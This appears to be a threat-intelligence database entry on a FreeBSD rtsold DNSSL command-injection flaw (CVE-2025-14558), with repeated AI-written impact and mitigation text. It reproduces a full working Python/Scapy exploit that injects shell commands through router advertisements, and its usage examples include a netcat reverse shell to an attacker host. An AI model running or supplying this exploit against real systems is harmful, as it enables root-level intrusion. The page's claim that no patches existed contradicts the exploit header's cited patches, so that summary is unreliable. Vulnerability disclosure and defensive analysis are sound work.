FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
AI Analysis
Technical Summary
The FreeBSD rtsold daemon, responsible for processing IPv6 router advertisements to configure network parameters, contains a critical remote code execution vulnerability in version 15.x. The vulnerability arises from improper handling of the DNSSL (DNS Search List) option within router advertisement messages. An attacker can craft malicious IPv6 router advertisements containing specially crafted DNSSL options that exploit this flaw, leading to arbitrary code execution on the target system without requiring authentication or user interaction. The rtsold daemon runs with elevated privileges, so successful exploitation can result in full system compromise, impacting confidentiality, integrity, and availability. The presence of publicly available Python exploit code (EDB ID 52463) lowers the barrier for attackers to weaponize this vulnerability. Although no active exploitation has been reported, the critical severity and ease of exploitation make this a significant threat. The lack of official patches or mitigations at the time of disclosure necessitates immediate defensive measures. This vulnerability is particularly relevant for environments relying on FreeBSD 15.x for IPv6 network configuration, including ISPs, data centers, and enterprise networks. The attack vector is network-based, requiring the attacker to send malicious IPv6 router advertisements to the target, which may be feasible in local or compromised network segments.
Potential Impact
European organizations using FreeBSD 15.x with rtsold enabled for IPv6 network configuration face a high risk of remote code execution attacks that can lead to full system compromise. This can result in unauthorized access to sensitive data, disruption of network services, and potential lateral movement within corporate networks. Critical infrastructure providers, telecommunications companies, and data centers are particularly vulnerable due to their reliance on robust IPv6 configurations and FreeBSD-based systems. The compromise of such systems could disrupt essential services, cause data breaches, and damage organizational reputation. Additionally, the exploitability without authentication or user interaction increases the likelihood of successful attacks, especially in environments with exposed IPv6 networks or insufficient network segmentation. The absence of patches at disclosure heightens the urgency for proactive mitigation to prevent exploitation and limit potential damage.
Mitigation Recommendations
1. Immediately monitor FreeBSD security advisories and apply official patches once released. 2. Until patches are available, disable the rtsold daemon if IPv6 router advertisement processing is not essential. 3. Implement strict network segmentation and filtering to block unauthorized IPv6 router advertisements, especially from untrusted or external sources. 4. Deploy Intrusion Detection/Prevention Systems (IDS/IPS) capable of detecting anomalous or malformed IPv6 router advertisements targeting DNSSL options. 5. Use firewall rules to restrict access to systems running rtsold, limiting exposure to potentially malicious network traffic. 6. Conduct network traffic analysis to identify suspicious IPv6 router advertisements and respond promptly. 7. Consider deploying endpoint detection and response (EDR) solutions to detect unusual process behavior indicative of exploitation. 8. Educate network administrators about the risks associated with IPv6 router advertisement handling and the importance of timely patching.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Norway, Denmark
Indicators of Compromise
- exploit-code: # Exploit Title: FreeBSD rtsold 15.x - Remote Code Execution via DNSSL # Date: 2025-12-16 # Exploit Author: Lukas Johannes Möller # Vendor Homepage: https://www.freebsd.org/ # Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches) # Tested on: FreeBSD 14.1-RELEASE # CVE: CVE-2025-14558 # # Description: # rtsold(8) processes IPv6 Router Advertisement DNSSL options without # validating domain names for shell metacharacters. The decoded domains # are passed to resolvconf(8), a shell script that uses unquoted variable # expansion, enabling command injection via $() substitution. # # Requirements: # - Layer 2 adjacency to target # - Target running rtsold with ACCEPT_RTADV enabled # - Root privileges (raw socket for sending RA) # - Python 3 + Scapy # # References: # https://security.FreeBSD.org/advisories/FreeBSD-SA-25:12.rtsold.asc # https://github.com/JohannesLks/CVE-2025-14558 import argparse import struct import sys import time try: from scapy.all import ( Ether, IPv6, ICMPv6ND_RA, ICMPv6NDOptPrefixInfo, ICMPv6NDOptSrcLLAddr, Raw, get_if_hwaddr, sendp ) except ImportError: sys.exit("[!] Scapy required: pip install scapy") def encode_domain(name): """Encode domain in DNS wire format (RFC 1035).""" result = b"" for label in name.split("."): if label: data = label.encode() result += bytes([len(data)]) + data return result + b"\x00" def encode_payload(cmd): """Encode payload as DNS label with $() wrapper for command substitution.""" payload = f"$({cmd})".encode() if len(payload) > 63: # Split long payloads across labels (dots inserted on decode) result = b"" while payload: chunk = payload[:63] payload = payload[63:] result += bytes([len(chunk)]) + chunk return result + b"\x00" return bytes([len(payload)]) + payload + b"\x00" def build_dnssl(cmd, lifetime=0xFFFFFFFF): """Build DNSSL option (RFC 6106) with injected command.""" data = encode_domain("x.local") + encode_payload(cmd) # Pad to 8-byte boundary pad = (8 - (len(data) + 8) % 8) % 8 data += b"\x00" * pad # Type=31 (DNSSL), Length in 8-octet units length = (8 + len(data)) // 8 return struct.pack(">BBH", 31, length, 0) + struct.pack(">I", lifetime) + data def build_ra(mac, payload): """Build Router Advertisement with malicious DNSSL.""" return ( Ether(src=mac, dst="33:33:00:00:00:01") / IPv6(src="fe80::1", dst="ff02::1", hlim=255) / ICMPv6ND_RA(chlim=64, M=0, O=1, routerlifetime=1800) / ICMPv6NDOptSrcLLAddr(lladdr=mac) / ICMPv6NDOptPrefixInfo( prefixlen=64, L=1, A=1, validlifetime=2592000, preferredlifetime=604800, prefix="2001:db8::" ) / Raw(load=build_dnssl(payload)) ) def main(): p = argparse.ArgumentParser( description="CVE-2025-14558 - FreeBSD rtsold DNSSL Command Injection", epilog="Examples:\n" " %(prog)s -i eth0\n" " %(prog)s -i eth0 -p 'id>/tmp/pwned'\n" " %(prog)s -i eth0 -p 'nc LHOST 4444 -e /bin/sh'", formatter_class=argparse.RawDescriptionHelpFormatter ) p.add_argument("-i", "--interface", required=True, help="Network interface") p.add_argument("-p", "--payload", default="touch /tmp/pwned", help="Command to execute") p.add_argument("-c", "--count", type=int, default=3, help="Packets to send (default: 3)") args = p.parse_args() try: mac = get_if_hwaddr(args.interface) except Exception as e: sys.exit(f"[!] Interface error: {e}") print(f"[*] Interface: {args.interface} ({mac})") print(f"[*] Payload: {args.payload}") pkt = build_ra(mac, args.payload) for i in range(args.count): sendp(pkt, iface=args.interface, verbose=False) print(f"[+] Sent RA {i+1}/{args.count}") if i < args.count - 1: time.sleep(1) print("[+] Done") if __name__ == "__main__": main()
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
Description
FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
AI-Powered Analysis
Technical Analysis
The FreeBSD rtsold daemon, responsible for processing IPv6 router advertisements to configure network parameters, contains a critical remote code execution vulnerability in version 15.x. The vulnerability arises from improper handling of the DNSSL (DNS Search List) option within router advertisement messages. An attacker can craft malicious IPv6 router advertisements containing specially crafted DNSSL options that exploit this flaw, leading to arbitrary code execution on the target system without requiring authentication or user interaction. The rtsold daemon runs with elevated privileges, so successful exploitation can result in full system compromise, impacting confidentiality, integrity, and availability. The presence of publicly available Python exploit code (EDB ID 52463) lowers the barrier for attackers to weaponize this vulnerability. Although no active exploitation has been reported, the critical severity and ease of exploitation make this a significant threat. The lack of official patches or mitigations at the time of disclosure necessitates immediate defensive measures. This vulnerability is particularly relevant for environments relying on FreeBSD 15.x for IPv6 network configuration, including ISPs, data centers, and enterprise networks. The attack vector is network-based, requiring the attacker to send malicious IPv6 router advertisements to the target, which may be feasible in local or compromised network segments.
Potential Impact
European organizations using FreeBSD 15.x with rtsold enabled for IPv6 network configuration face a high risk of remote code execution attacks that can lead to full system compromise. This can result in unauthorized access to sensitive data, disruption of network services, and potential lateral movement within corporate networks. Critical infrastructure providers, telecommunications companies, and data centers are particularly vulnerable due to their reliance on robust IPv6 configurations and FreeBSD-based systems. The compromise of such systems could disrupt essential services, cause data breaches, and damage organizational reputation. Additionally, the exploitability without authentication or user interaction increases the likelihood of successful attacks, especially in environments with exposed IPv6 networks or insufficient network segmentation. The absence of patches at disclosure heightens the urgency for proactive mitigation to prevent exploitation and limit potential damage.
Mitigation Recommendations
1. Immediately monitor FreeBSD security advisories and apply official patches once released. 2. Until patches are available, disable the rtsold daemon if IPv6 router advertisement processing is not essential. 3. Implement strict network segmentation and filtering to block unauthorized IPv6 router advertisements, especially from untrusted or external sources. 4. Deploy Intrusion Detection/Prevention Systems (IDS/IPS) capable of detecting anomalous or malformed IPv6 router advertisements targeting DNSSL options. 5. Use firewall rules to restrict access to systems running rtsold, limiting exposure to potentially malicious network traffic. 6. Conduct network traffic analysis to identify suspicious IPv6 router advertisements and respond promptly. 7. Consider deploying endpoint detection and response (EDR) solutions to detect unusual process behavior indicative of exploitation. 8. Educate network administrators about the risks associated with IPv6 router advertisement handling and the importance of timely patching.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52463
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for FreeBSD rtsold 15.x - Remote Code Execution via DNSSL
# Exploit Title: FreeBSD rtsold 15.x - Remote Code Execution via DNSSL # Date: 2025-12-16 # Exploit Author: Lukas Johannes Möller # Vendor Homepage: https://www.freebsd.org/ # Version: FreeBSD 13.x, 14.x, 15.x (before 2025-12-16 patches) # Tested on: FreeBSD 14.1-RELEASE # CVE: CVE-2025-14558 # # Description: # rtsold(8) processes IPv6 Router Advertisement DNSSL options without # validating domain names for shell metacharacters. The decoded domains # are passed to resolvconf(8), a shell sc... (3609 more characters)
Threat ID: 694d89022ffa995e0c012b37
Added to database: 12/25/2025, 6:57:06 PM
Last enriched: 12/25/2025, 6:57:42 PM
Last updated: 12/26/2025, 10:00:45 AM
Views: 722
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Chained Quiz 1.3.5 - Unauthenticated Insecure Direct Object Reference via Cookie
MediumWordPress Quiz Maker 6.7.0.56 - SQL Injection
MediumFortinet Warns of Active Exploitation of FortiOS SSL VPN 2FA Bypass Vulnerability
HighCISA Flags Actively Exploited Digiever NVR Vulnerability Allowing Remote Code Execution
HighCISA Flags Actively Exploited Digiever NVR Vulnerability Allowing Remote Code Execution
CriticalActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.